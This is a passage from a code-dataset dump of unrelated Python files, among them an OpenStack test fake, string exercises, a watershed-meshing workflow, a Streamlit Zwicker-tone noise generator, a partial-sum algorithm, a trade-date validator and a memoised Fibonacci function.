See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\nimport mock\n\nextension_name = 'Matrix'\nextension_namespace = 'http://docs.openstack.org/network/'\nextension_description = 'Simulated reality'\nextension_updated = '2013-07-09T12:00:0-00:00'\nextension_alias = 'Dystopian'\nextension_links = '[{\"href\":''\"https://github.com/os/network\", \"type\"}]'\n\nNETEXT = {\n 'name': extension_name,\n 'namespace': extension_namespace,\n 'description': extension_description,\n 'updated': extension_updated,\n 'alias': extension_alias,\n 'links': extension_links,\n}\n\n\nclass FakeNetworkV2Client(object):\n def __init__(self, **kwargs):\n self.list_extensions = mock.Mock(return_value={'extensions': [NETEXT]})\n","repo_name":"codybum/OpenStackInAction","sub_path":"scripts/icehouse/opt/stack/python-openstackclient/openstackclient/tests/network/v2/fakes.py","file_name":"fakes.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"43"} +{"seq_id":"10656543661","text":"class funString():\n def lenStr(self, s):\n return len(s)\n\n def swStr(self, s):\n x = \"\"\n for i in range(len(s)):\n if ord(s[i]) > 90:\n x += chr(ord(s[i])-32)\n else:\n x += chr(ord(s[i])+32)\n return x\n\n def revStr(self, s):\n x = \"\"\n for i in range(len(s)-1, -1, -1):\n x += s[i]\n return x\n\n def remStr(self, s):\n x = \"\"\n for i in range(len(s)):\n if s[i] not in x:\n x += s[i]\n return x\n\n\nfs = funString()\nlis = list(input(\"Enter String and Number of Function : \").split(' '))\ns = lis[0]\nnum = int(lis[1])\nif num == 1:\n print(fs.lenStr(s))\nelif num == 2:\n print(fs.swStr(s))\nelif num == 3:\n print(fs.revStr(s))\nelse:\n print(fs.remStr(s))\n","repo_name":"pjpure/ClassDocuments","sub_path":"DataStructures/lab2/ex_5.py","file_name":"ex_5.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"5590469230","text":"\"\"\"High-level routines, espeically those that interact with data,\ni.e. call download_*() or load_*() functions from conf.\n\nMost scripts use these functions instead of directly using lower-level\ncapability.\n\n\"\"\"\n\nimport sys,os\nimport numpy as np\nfrom mpl_toolkits.mplot3d.axes3d import Axes3D\nimport matplotlib.pyplot as plt\nimport matplotlib.collections as pltc\nimport logging\n\nimport fiona\nimport shapely\nimport meshpy.triangle\n\nimport workflow.conf\nimport workflow.triangulate\nimport workflow.warp\nimport workflow.plot\nimport workflow.tree\nimport workflow.hucs\nimport workflow.hydrography\nimport workflow.clip\nimport workflow.rowcol\n\nimport vtk_io # from ATS/tools/meshing_ats\n\ndef _in_huc(shp, hucstr, source):\n \"\"\"Checks whether shp is in HUC\"\"\"\n logging.debug(\"Checking: shp in '%s'?\"%hucstr)\n\n try:\n fname = source.download(hucstr)\n profile, huc = source.load_huc(hucstr)\n except RuntimeError as err:\n logging.debug(\"No such HUC %s found? 
%s\"%(hucstr,str(err)))\n raise err\n\n if profile['crs']['init'] != 'epsg:4269':\n # latlong\n raise RuntimeError(\"HUC file for '%s' not in Lat-Lon?\"%hucstr)\n\n huc_shp = shapely.geometry.shape(huc['geometry'])\n logging.debug(\" shp bounds = %r\"%list(shp.bounds))\n logging.debug(\" huc bounds = %r\"%list(huc_shp.bounds))\n if huc_shp.contains(shp):\n logging.debug(' yes!')\n return 2\n elif huc_shp.intersects(shp):\n logging.debug(' sorta!')\n return 1\n else:\n logging.debug(' no!')\n return 0\n\ndef _find_huc(shp, hint, source):\n for i in range(0,100):\n try_huc = hint+'%02i'%i\n try:\n inhuc = _in_huc(shp, try_huc, source)\n except RuntimeError:\n if try_huc.endswith('00'):\n # some huc levels have 00, some don't?\n continue\n else:\n return -1\n\n if inhuc == 2:\n # fully contained in try_huc, recurse if not HUC12\n if len(try_huc) == 12:\n return try_huc\n else:\n return _find_huc(shp, try_huc, source)\n elif inhuc == 1:\n # partially contained in try_huc, return this\n return hint\n return -1\n\n\ndef find_huc(shp_profile, shply, source, hint=None):\n \"\"\"Finds the smallest HUC containing shp, starting with a potential\n hint, i.e. '06' for Tennessee River Valley.\n\n Expects shp in lat-lon, i.e. epsg:4269\n \"\"\"\n if shp_profile['crs']['init'] != 'epsg:4269':\n # latlong\n raise RuntimeError(\"shapefile not in Lat-Lon\")\n\n shply = shply.buffer(-.001)\n\n if hint is None:\n hint = ''\n if len(hint) is 12:\n inhuc = _in_huc(shply, hint, source)\n if inhuc is not 2:\n raise RuntimeError(\"Shape not found in hinted HUC '%s'\"%hint)\n return hint\n \n result = _find_huc(shply, hint, source)\n if type(result) is not str:\n raise RuntimeError(\"Shape not found in hinted HUC '%s'\"%hint)\n return result\n\ndef get_hucs(myhuc, source, level=12, center=True):\n \"\"\"Collects shapefiles for HUCs given a HUC code in string form.\n\n Arguments:\n myhuc | a length N string for the number of the requested HUC.\n | Note this must be an even number of digits, i.e. 
01, not 1.\n center | If true, subtract off the HUC centroid.\n\n Returns (huc,huc12s,centroid):\n huc | the fiona shape representation of the requested HUC\n huc12s | a workflow.hucs.HUCs object for shapely shapes of all HUC \n | 12s in myhuc\n centroid| The centroid of the HUC requested, for use in uncentering.\n \"\"\"\n ## === Preprocess HUCs ===\n logging.info(\"\")\n logging.info(\"Preprocessing HUCs\")\n logging.info(\"=====================\")\n\n # collect HUC shapefile\n logging.info(\"collecting HUC %s\"%myhuc[0:2])\n source.download(myhuc)\n\n # load shapefiles for all HUC 12s\n logging.info(\"loading all %is\"%level)\n profile, huc12s = source.load_hucs_in(myhuc, level)\n\n # change coordinates to meters (in place)\n logging.info(\"change coordinates to m\")\n for huc12 in huc12s:\n workflow.warp.warp_shape(huc12, profile['crs'], workflow.conf.default_crs())\n\n # convert to shapely\n huc_shapes = [shapely.geometry.shape(s['geometry']) for s in huc12s]\n\n # if multi-poly, make sure we can convert to single-poly\n single_huc_shapes = []\n for huc_shp in huc_shapes:\n if type(huc_shp) is not shapely.geometry.Polygon:\n assert(len(huc_shp) is 1)\n huc_shp = huc_shp[0]\n assert(type(huc_shp) is shapely.geometry.Polygon)\n single_huc_shapes.append(huc_shp)\n huc_shapes = single_huc_shapes\n\n # center the HUCs\n if center:\n huc_shapes, centroid = workflow.utils.center(huc_shapes)\n else:\n centroid = shapely.geometry.Point(0,0)\n\n # split\n logging.info(\"Split form HUCs\")\n hucs = workflow.hucs.HUCs(huc_shapes)\n logging.info(\"...done\")\n return hucs, centroid\n\ndef get_rivers(myhuc, source):\n \"\"\"Collects shapefiles for hydrography data within a given HUC.\n\n Arguments:\n myhuc | a length N string for the number of the requested HUC.\n | Note this must be an even number of digits, i.e. 01, not 1.\n\n Returns:\n rivers | A list of shapely LineString objects representing all \n | reaches within the HUC.\n \"\"\"\n ## === Preprocess hydrography ===\n logging.info(\"\")\n logging.info(\"Preprocessing hydrography\")\n logging.info(\"==========================\")\n\n # collect hydrography\n logging.info(\"collecting Hydrography %s\"%myhuc)\n source.download(myhuc)\n\n # load the HUC and get a bounding box\n profile, huc = source.load_huc(myhuc)\n bounds = shapely.geometry.shape(huc['geometry']).bounds\n \n # load stream network\n logging.info(\"loading streams\")\n rprofile, rivers = source.load_hydro(myhuc, bounds)\n\n # change coordinates to meters (in place)\n logging.info(\"change coordinates to m\")\n for river in rivers:\n workflow.warp.warp_shape(river, rprofile['crs'], workflow.conf.default_crs())\n\n # convert to shapely\n logging.info(\"merging reaches\")\n rivers_s = shapely.geometry.MultiLineString([shapely.geometry.shape(r['geometry']) for r in rivers])\n rivers_s2 = shapely.ops.linemerge(rivers_s).simplify(1.e-5)\n return rivers_s2\n\ndef get_dem(myhuc, sources):\n \"\"\"Collects a raster DEM that covers the requested HUC.\n\n Arguments:\n huc | The fiona shapefile of the HUC. 
Output from \n | get_hucs().\n\n Returns (dem_profile, dem):\n dem_profile | A rasterio profile file descriptor object.\n dem | A raster, in lat/lon, of elevations.\n \"\"\"\n logging.info(\"\")\n logging.info(\"Preprocessing DEM\")\n logging.info(\"==========================\")\n logging.info(\"downloading DEM\")\n\n # load shapefiles for the HUC of interest\n logging.info(\"loading HUC %s\"%myhuc)\n profile, huc = sources['HUC'].load_huc(myhuc)\n assert(profile['crs']['init'] == 'epsg:4269') # latlong\n\n dem_profile, dem = workflow.clip.clip_dem(huc, sources['DEM'])\n dem = dem[0,:,:] # only the first band\n return dem_profile, dem\n\n\ndef get_shapes(filename, index, center=True, make_hucs=True):\n \"\"\"Collects shapefiles.\n\n Arguments:\n filename| File to parse, should end in .shp\n index | Index of the requested shape in filename, or -1 to get all.\n center | If true, subtract off the centroid.\n\n Returns (profile, sheds, boundary, centroid)\n profile | the fiona profile/projection/etc for the shapefile\n | Note this includes original projection.\n sheds | a workflow.hucs.HUCs object for all watershed shapes requested, \n | in the default coordinate system.\n boundary| The boundary of the union of watersheds, in the original\n | coordinate system.\n centroid| The centroid of the watersheds requested, for use in uncentering.\n \"\"\"\n logging.info(\"\")\n logging.info(\"Preprocessing Shapes\")\n logging.info(\"=====================\")\n\n # load shapefile\n logging.info(\"loading file: %s\"%filename)\n with fiona.open(filename, 'r') as fid:\n profile = fid.profile\n if index < 0:\n shps = [s for s in fid]\n else:\n shps = [fid[index],]\n\n # convert the original coordinate system to lat-lon to get a lat-lon boundary\n if profile['crs']['init'] != 'epsg:4269':\n for shp in shps:\n workflow.warp.warp_shape(shp, profile['crs'], workflow.conf.latlon_crs())\n profile['crs']['init'] = 'epsg:4269'\n \n # convert original coordinate system to shapely\n huc_shapes = [shapely.geometry.shape(s['geometry']) for s in shps]\n boundary = shapely.ops.cascaded_union(huc_shapes)\n \n # change coordinates to meters (in place)\n logging.info(\"change coordinates to m\")\n for shp in shps:\n workflow.warp.warp_shape(shp, profile['crs'], workflow.conf.default_crs())\n\n # convert to shapely\n huc_shapes = [shapely.geometry.shape(s['geometry']) for s in shps]\n\n # center the HUCs\n if center:\n huc_shapes, centroid = workflow.utils.center(huc_shapes)\n else:\n centroid = shapely.geometry.Point(0,0)\n\n # split\n logging.info(\"Split form subwatersheds\")\n if make_hucs:\n hucs = workflow.hucs.HUCs(huc_shapes)\n else:\n hucs = huc_shapes\n logging.info(\"...done\")\n return profile, hucs, boundary, centroid\n \n\ndef simplify_and_prune(hucs, rivers, args):\n \"\"\"Cleans up the HUC and river shapes, making sure intersections are\n proper, snapped, simplified, etc.\n\n \"\"\"\n tol = args.simplify\n \n logging.info(\"\")\n logging.info(\"Simplifying and pruning\")\n logging.info(\"========================\")\n logging.info(\"filtering rivers outside of the HUC space\")\n rivers = workflow.hydrography.filter_rivers_to_huc(hucs, rivers, tol)\n if len(rivers) is 0:\n return rivers\n\n logging.info(\"removing rivers with only a few reaches\")\n for i in reversed(range(len(rivers))):\n ltree = len(rivers[i])\n if ltree < args.prune_reach_size:\n rivers.pop(i)\n logging.info(\" removing river with %d reaches\"%ltree)\n else:\n logging.info(\" keeping river with %d reaches\"%ltree)\n if len(rivers) is 0:\n 
return rivers\n \n logging.info(\"simplifying rivers\")\n workflow.hydrography.cleanup(rivers, tol, tol, tol)\n\n logging.info(\"simplify HUCs\")\n workflow.hucs.simplify(hucs, tol)\n\n # snap\n logging.info(\"snapping rivers and HUCs\")\n rivers = workflow.hydrography.snap(hucs, rivers, tol, 10*tol, args.cut_intersections)\n \n logging.info(\"filtering cut reaches outside the HUC space\")\n rivers = workflow.hydrography.filter_rivers_to_huc(hucs, rivers, -0.1*tol)\n logging.info(\"...done\")\n\n logging.info(\"Resulting info\")\n if len(rivers) is not 0:\n mins = []\n for river in rivers:\n for line in river.dfs():\n coords = np.array(line.coords[:])\n dz = np.linalg.norm(coords[1:] - coords[:-1], 2, -1)\n mins.append(np.min(dz))\n logging.info(\" river min seg length: %g\"%min(mins))\n logging.info(\" river median seg length: %g\"%np.median(np.array(mins)))\n\n mins = []\n for line in hucs.segments:\n coords = np.array(line.coords[:])\n dz = np.linalg.norm(coords[1:] - coords[:-1], 2, -1)\n mins.append(np.min(dz))\n logging.info(\" HUC min seg length: %g\"%min(mins))\n logging.info(\" HUC median seg length: %g\"%np.median(np.array(mins)))\n return rivers\n \ndef triangulate(hucs, rivers, args, diagnostics=True):\n verbose = args.verbosity > 2\n \n logging.info(\"\")\n logging.info(\"Meshing\")\n logging.info(\"===============\")\n if args.refine_max_area is not None:\n refine_func = workflow.triangulate.refine_from_max_area(args.refine_max_area)\n elif args.refine_distance is not None:\n refine_func = workflow.triangulate.refine_from_river_distance(*args.refine_distance, rivers)\n else:\n def refine_func(*args, **kwargs):\n return False\n\n mesh_points, mesh_tris = workflow.triangulate.triangulate(hucs, rivers, verbose=verbose,\n refinement_func=refine_func)\n\n if diagnostics:\n logging.info(\"triangulation diagnostics\")\n river_multiline = workflow.tree.forest_to_list(rivers)\n distances = []\n areas = []\n needs_refine = []\n for tri in mesh_tris:\n vertices = mesh_points[tri]\n bary = np.sum(np.array(vertices), axis=0)/3\n bary_p = shapely.geometry.Point(bary[0], bary[1])\n distances.append(bary_p.distance(river_multiline))\n areas.append(workflow.utils.triangle_area(vertices))\n needs_refine.append(refine_func(vertices, areas[-1]))\n\n if args.verbosity > 0:\n plt.figure()\n plt.subplot(121)\n plt.hist(distances)\n plt.xlabel(\"distance from river of triangle centroids [m]\")\n plt.ylabel(\"count [-]\")\n plt.subplot(122)\n plt.scatter(distances, areas,c=needs_refine,marker='x')\n plt.xlabel(\"distance [m]\")\n plt.ylabel(\"triangle area [m^2]\") \n return mesh_points, mesh_tris\n\ndef elevate(mesh_points, dem, dem_profile):\n # -- must map back to lat/lon to take from dem\n logging.info(\"elevating\")\n triangles_3d = []\n mesh_points_ll = np.array(workflow.warp.warp_xy(mesh_points[:,0], mesh_points[:,1], workflow.conf.default_crs(), workflow.conf.latlon_crs())).transpose()\n elev = dem[workflow.rowcol.rowcol(dem_profile['affine'], mesh_points_ll[:,0], mesh_points_ll[:,1])]\n mesh_points_3 = np.zeros((len(mesh_points),3),'d')\n mesh_points_3[:,0:2] = mesh_points\n mesh_points_3[:,2] = elev\n return mesh_points_3\n \ndef save(filename, points3, tris, metadata):\n \"\"\"Save as a VTK mesh. 
\n\n This could be Exodus, but meshing_ats is in python2 (and uses exodus which is in python2)\n \"\"\"\n logging.info(\"saving mesh: %s\"%filename)\n cells = {'triangle':tris}\n vtk_io.write(filename, points3, cells)\n with open(filename+'.readme','w') as fid:\n fid.write(metadata)\n\n \n","repo_name":"q-rai/ideal-octo-waffle","sub_path":"workflow/hilev.py","file_name":"hilev.py","file_ext":"py","file_size_in_byte":14461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"24911749432","text":"import streamlit as st\nimport numpy as np\nfrom scipy import fft\nimport matplotlib.pyplot as plt\n\nT = 60\n\ndef get_normalized_white_noise(sampling_frequency):\n white_noise = np.random.normal(size = (T*sampling_frequency))\n white_noise /= np.max(abs(white_noise))\n return white_noise\n\ndef apply_band_stop_filter(signal, sample_rate, low_pass, high_pass):\n ft = fft.rfft(signal)\n freq = fft.rfftfreq(signal.size, d = 1/sample_rate)\n\n band = (freq >= low_pass) * (freq <= high_pass)\n ft[band] = 0\n\n return fft.irfft(ft)\n\nst.title(\"The Zwicker Tone\")\n\nsampling_frequency = st.number_input(\"Sampling Frequency (Hz)\", min_value=1, max_value=352_800, value=44_100)\neffect_type = st.selectbox(\"Type\", [\"Monaural\",\"Binaural\", \"Alternating Silence\"])\n\nif effect_type == \"Binaural\":\n n_channels = 2\n slider_ranges = [st.slider(f\"Band-stop Filter for channel {channel + 1} (Hz)\", \n min_value = 0, \n max_value=sampling_frequency//2, \n value=[2_200, 3_300],\n step=100) for channel in range(n_channels)]\n signal = np.stack([apply_band_stop_filter(get_normalized_white_noise(sampling_frequency), \n sampling_frequency, \n slider_ranges[i][0], \n slider_ranges[i][1]) \n for i in range(n_channels)])\n \n # fig, ax = plt.subplots(2, 2)\n # fig.set_figheight(10)\n # fig.set_figwidth(20)\n\n # time = np.arange(0, T, 1/sampling_frequency)\n\n # ax[0][0].plot(time, signal[0])\n # ax[0][0].set_title(\"Channel 1 Audioform\")\n # ax[0][0].set_ylabel(\"Amplitude\")\n # ax[0][0].set_xlabel(\"Time (s)\")\n\n # ax[0][1].plot(time, signal[1])\n # ax[0][1].set_title(\"Channel 2 Audioform\")\n # ax[0][1].set_ylabel(\"Amplitude\")\n # ax[0][1].set_xlabel(\"Time (s)\")\n\n # ax[1][0].specgram(signal[0], Fs = sampling_frequency)\n # ax[1][0].set_title(\"Channel 1 Spectrograph\")\n # ax[1][0].set_ylabel(\"Frequency (Hz)\")\n # ax[1][0].set_xlabel(\"Time (s)\")\n \n # ax[1][1].specgram(signal[1], Fs = sampling_frequency)\n # ax[1][1].set_title(\"Channel 2 Spectrograph\")\n # ax[1][1].set_ylabel(\"Frequency (Hz)\")\n # ax[1][1].set_xlabel(\"Time (s)\")\n # st.pyplot(fig)\nelse:\n n_channels = 1\n slider_range = st.slider(f\"Band-stop Filter (Hz)\", \n min_value = 0, \n max_value=sampling_frequency//2, \n value=[2_200, 3_300],\n step=100) \n if effect_type == \"Alternating Silence\":\n noise_interval = st.number_input(\"Noise Interval Duration (ms)\", 0, T*1000, value=500)\n noise_samples= int(noise_interval/1000 * sampling_frequency)\n\n silence_interval = st.number_input(\"Silence Interval Duration (ms)\", 0, T*1000, value=500)\n silence_samples = int(silence_interval/1000 * sampling_frequency)\n\n signal = apply_band_stop_filter(get_normalized_white_noise(sampling_frequency), \n sampling_frequency, \n slider_range[0], \n slider_range[1])\n i = 0 \n while i*(noise_interval + silence_interval) < T*sampling_frequency:\n signal[noise_samples*i+silence_samples*i:noise_samples*i + silence_samples*(i+1)] = 0\n i+= 1\n\n # fig, ax = plt.subplots(2, 1)\n # 
fig.set_figheight(10)\n # fig.set_figwidth(20)\n\n # time = np.arange(0, T, 1/sampling_frequency)\n # ax[0].plot(time, signal)\n # ax[0].set_title(\"Audioform\")\n # ax[0].set_ylabel(\"Amplitude\")\n # ax[0].set_xlabel(\"Time (s)\")\n\n # ax[1].specgram(signal, Fs = sampling_frequency)\n # ax[1].set_title(\"Spectrograph\")\n # ax[1].set_ylabel(\"Frequency (Hz)\")\n # ax[1].set_xlabel(\"Time (s)\")\n # st.pyplot(fig)\n\n elif effect_type == \"Monaural\":\n\n signal = apply_band_stop_filter(get_normalized_white_noise(sampling_frequency), \n sampling_frequency, \n slider_range[0], \n slider_range[1])\n\n # fig, ax = plt.subplots(2, 1)\n # fig.set_figheight(10)\n # fig.set_figwidth(20)\n\n # time = np.arange(0, T, 1/sampling_frequency)\n # ax[0].plot(time, signal)\n # ax[0].set_title(\"Audioform\")\n # ax[0].set_ylabel(\"Amplitude\")\n # ax[0].set_xlabel(\"Time (s)\")\n\n # ax[1].specgram(signal, Fs = sampling_frequency)\n # ax[1].set_title(\"Spectrograph\")\n # ax[1].set_ylabel(\"Frequency (Hz)\")\n # ax[1].set_xlabel(\"Time (s)\")\n # st.pyplot(fig)\n\n\n\nst.audio(signal, sample_rate=sampling_frequency)","repo_name":"JKilgallen/zwicker_tone","sub_path":"web_app/zwicker_app.py","file_name":"zwicker_app.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"157433187","text":"# 반례 모음: https://bingorithm.tistory.com/13\n\n'''\n시간초과\n'''\n'''\nimport sys\ninput = sys.stdin.readline\n\nn, s = map(int, input().split())\nlst = list(map(int, input().split()))\nminLen = len(lst)\n\nfor num in lst:\n if num>=s:\n minLen = 1\n break\n\nl, r = 0, 1\nwhile l < r:\n # print(lst[l:r+1], sum(lst[l:r+1]))\n \n if sum(lst[l:r+1])>= s:\n minLen = min(minLen, r-l+1)\n # print('minLen: ',minLen)\n l += 1\n else:\n r += 1\nprint(minLen) \n'''\n\n'''\nsolution2 144ㅡms\n'''\nimport sys\ninput = sys.stdin.readline\n\nn, s = map(int, input().split())\nlst = list(map(int, input().split()))\n\ndef solve(s, lst):\n minLen = 100001\n total = 0\n l, r = 0, 0\n while True:\n if total >= s:\n minLen = min(minLen, r-l)\n total -= lst[l]\n l += 1 \n elif r == n:\n break\n else:\n total += lst[r]\n r += 1\n if minLen == 100001:\n return 0\n else:\n return minLen\n\n\nprint(solve(s, lst))\n","repo_name":"intensive-study/ps-cs-project-study","sub_path":"Problem Solving/04주차/부분합(이진).py","file_name":"부분합(이진).py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"21695087663","text":"import requests\nimport base64\nimport functions_framework\nimport re\n\nfrom bs4 import BeautifulSoup\n\nfrom datetime import date\nimport datetime\n\nfrom common import *\n\n\n# triggered from a message on a Cloud Pub/Sub topic.\n@functions_framework.cloud_event\ndef run_scrape_events(cloud_event):\n message = base64.b64decode(cloud_event.data[\"message\"][\"data\"]).decode()\n if message == \"scrape events\":\n print(\"running scrape events\")\n event_data = scrape_event_data()\n print(\n \"scraped \" + str(len(event_data)) + \" events successfully, publishing to DB\"\n )\n publish_to_db(event_data)\n\n\ndef changeToFullTime(hour, isPM):\n num_hours = 0\n if \":\" not in hour:\n num_hours = int(hour)\n hour = hour + \":00\"\n num_hours = int(hour[0]) if len(hour) == 4 else int(hour[0:2])\n\n if isPM:\n second_part = hour[1:] if num_hours < 10 else hour[2:]\n if num_hours != 12:\n num_hours += 12\n hour = str(num_hours) + second_part\n else:\n 
second_part = hour[1:] if num_hours < 10 else hour[2:]\n first_part = \"\"\n if num_hours == 12:\n first_part = \"00\"\n elif num_hours < 10:\n first_part = \"0\" + str(num_hours)\n else:\n first_part = str(num_hours)\n\n hour = first_part + second_part\n\n return hour\n\n\ndef convert(string, day):\n start = str(day)\n end = str(day)\n if string == \"All day\":\n start = start + \" 00:00\"\n end = end + \" 23:59\"\n ## Return array\n else:\n all_hours = re.findall(\"[0-9]+:?[0-9]*\", string)\n am = \"a.m.\" in string\n pm = \"p.m.\" in string\n\n if len(all_hours) == 1:\n hour = all_hours[0]\n if pm:\n hour = changeToFullTime(hour, True)\n else:\n hour = changeToFullTime(hour, False)\n\n start = start + \" \" + hour\n end = end + \" \" + hour\n\n else:\n hour1 = all_hours[0]\n hour2 = all_hours[1]\n\n if am and pm:\n hour1 = changeToFullTime(hour1, False)\n hour2 = changeToFullTime(hour2, True)\n elif pm:\n hour1 = changeToFullTime(hour1, True)\n hour2 = changeToFullTime(hour2, True)\n elif am:\n hour1 = changeToFullTime(hour1, False)\n hour2 = changeToFullTime(hour2, False)\n\n start = start + \" \" + hour1\n end = end + \" \" + hour2\n\n start = datetime.datetime.strptime(start, \"%Y-%m-%d %H:%M\")\n end = datetime.datetime.strptime(end, \"%Y-%m-%d %H:%M\")\n return [start, end]\n\n\ndef scrape_event_data() -> [Event]:\n time = date.today()\n\n events = []\n week = []\n for j in range(7):\n new_day = time + datetime.timedelta(days=j)\n week.append(str(new_day))\n\n for h in range(7):\n URL = \"https://today.wisc.edu/events/day/\" + week[h]\n page = requests.get(URL)\n\n soup = BeautifulSoup(page.content, \"html.parser\")\n results = soup.find(id=\"main\")\n\n iDs = re.findall(\"
  • \", page.text)\n\n ids = []\n for x in iDs:\n x = re.findall(\"[0-9]+\", x)[0]\n ids.append(x)\n i = 0\n details = results.find_all(\"div\", class_=\"event-details\")\n\n for detail in details:\n location = \"\"\n name = \"\"\n start = \"\"\n end = \"\"\n description = \"\"\n building = \"\"\n if detail is not None:\n if detail.find(\"p\", class_=\"event-location\") != -1:\n location = detail.find(\"p\", class_=\"event-location\")\n if location is not None:\n location = location.text.strip()\n else:\n location = detail.find(\"p\", class_=\"subtitle\")\n if location is not None:\n location = location.text.strip()\n else:\n location = detail.find(\"p\", class_=\"subtitle\")\n if location is not None:\n location = location.text.strip()\n\n if detail.find(\"h3\", class_=\"event-title\") != -1:\n name = detail.find(\"h3\", class_=\"event-title\")\n if name is not None:\n name = name.text.strip()\n\n if detail.find(\"p\", class_=\"event-time\") != -1:\n eventTime = detail.find(\"p\", class_=\"event-time\")\n if eventTime is not None:\n eventTime = eventTime.text\n start = convert(eventTime, week[h])[0]\n end = convert(eventTime, week[h])[1]\n else:\n start = convert(\"All day\", week[h])[0]\n end = convert(\"All day\", week[h])[1]\n else:\n start = convert(\"All day\", week[h])[0]\n end = convert(\"All day\", week[h])[1]\n\n id = ids[i]\n i += 1\n\n URL = \"https://today.wisc.edu/events/view/\" + str(id)\n page = requests.get(URL)\n soup = BeautifulSoup(page.content, \"html.parser\")\n results = soup.find(id=\"main\")\n if results.find(\"div\", class_=\"event-description\") != -1:\n description = results.find(\"div\", class_=\"event-description\")\n if description is not None:\n description = description.text.strip()\n\n event = Event(id, name, start, end, building, location, description)\n events.append(event)\n\n return events\n\n\ndef publish_to_db(event_data: [Event]):\n # clear all events in the db\n events_db.delete_many({})\n\n # convert the event data from array of classes to array of dictionaries (required by insert_many)\n doc = []\n for e in event_data:\n doc.append(e.__dict__)\n\n events_db.insert_many(doc)\n print(\"inserted all events into the DB!\")\n","repo_name":"gzhynko/madhacks2023","sub_path":"backend/scrape_events/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"24578132911","text":"from enum import Flag\nimport pickle\n\nclass flightGroup:\n #----------------------------------------------------------------------------------------------------------------------------------------------------\n def __init__(self, destination, dateLowerBound, dateUpperBound, stayRange, email, groupOrigins=None):\n # The __init__ function is the primary constructor for the class\n\n self.destination = destination # The Destination the Flight Group is heading to FORMAT (string): \"MSP\"\n self.dateLowerBound = dateLowerBound # The date the group would like to depart FORMAT (string): \"YYYY-MM-DD\" \n self.dateUpperBound = dateUpperBound # The date the group would like to return FORMAT (string): \"YYYY-MM-DD\"\n self.stayRange = stayRange # The length the group would like to stay FORMAT (tuple): (INT, INT)\n self.email = email # The email address associated with the group FORMAT (string): \"example@email.com\"\n \n if groupOrigins is None: # Home Airport-Passengers info FORMAT (list): [(\"LAX\", 3),...,(\"MAD\", 5)]\n self.groupOrigins = []\n else: 
self.groupOrigins = groupOrigins\n\n \n # Save pickles the instance\n #----------------------------------------------------------------------------------------------------------------------------------------------------\n def save(self): \n with open('flightGroupData.pkl', 'ab') as FGhandler:\n pickle.dump(self, FGhandler)\n \n # printinfo prints all information about the current group in a readable format\n #----------------------------------------------------------------------------------------------------------------------------------------------------\n def printinfo(self):\n print(\"Group Information: \")\n print(\"---------------------------------------------------------------------\")\n print(\"Your group is interested in traveling to: \" + self.destination)\n print(\"Sometime between \" + str(self.dateLowerBound) + \" and \" + str(self.dateUpperBound))\n print(\"And you are interested in a stay of \" + str(self.stayRange[0]) + \" to \" + str(self.stayRange[1]) + \" days\")\n print(\"Your contact email address is: \" + self.email)\n print(\"---------------------------------------------------------------------\")\n print(\"Traveler origins: \")\n for travelers in self.groupOrigins:\n print(str(travelers[1]) + \" Travelers from \" + travelers[0])","repo_name":"Owen-Hoglund/Flight-Tracker","sub_path":"flightGroupClassMk2.py","file_name":"flightGroupClassMk2.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"41634266241","text":"def caching_fibonacci():\n cache = {}\n def fibonacci(n):\n if n in cache:\n return cache[n]\n if n <= 1:\n return n\n fib = (fibonacci(n-1) + fibonacci(n-2))\n cache[n] = fib\n return fib\n return fibonacci\n\n\np = caching_fibonacci()\nprint(p(9))\n\n\n\n\n# def make_cached_fib():\n# cache = {}\n# def _(n):\n# if n in cache:\n# return cache[n]\n# if n <= 1:\n# return n\n# fib = (_(n-1) + _(n-2)) % 10\n# cache[n] = fib\n# return fib\n# return _\n\n# fib_last_digit_mem = make_cached_fib()\n","repo_name":"anfernee84/GOIT_AUTOCHEKS_ETC","sub_path":"module9/3-9.py","file_name":"3-9.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33664570924","text":"import json\nimport time\nimport datetime\nfrom util import *\n\ndef main(event):\n startTime = 1000*time.time()\n\n portfolio = event['body']['portfolio']\n portfolios = json.loads(open('data/portfolios.json', 'r').read())\n data = portfolios[portfolio]\n\n valid = True\n\n for trade in data:\n trddate = trade['TradeDate']\n # Tag ID: 75, Tag Name: TradeDate, Format: YYMMDD\n if len(trddate) == 6:\n try:\n datetime.datetime(int(trddate[0:2]), int(trddate[2:4]), int(trddate[4:6]))\n except ValueError:\n valid = False\n break\n else:\n valid = False\n break\n\n response = {'statusCode': 200, 'body': {'valid':valid, 'portfolio': portfolio}}\n endTime = 1000*time.time()\n return timestamp(response, event,startTime, endTime, 0)\n\n# if __name__==\"__main__\":\n# print(main({\"body\": {\"portfolioType\": \"S&P\",\"portfolio\": \"1234\"}}))\n","repo_name":"csl-iisc/faastlane","sub_path":"benchmarks/finra/trddate.py","file_name":"trddate.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"43"} +{"seq_id":"2670143358","text":"import ast\nfrom docstring_extractor import get_docstrings\n\n\ndef print_docstrings(node, script):\n if 
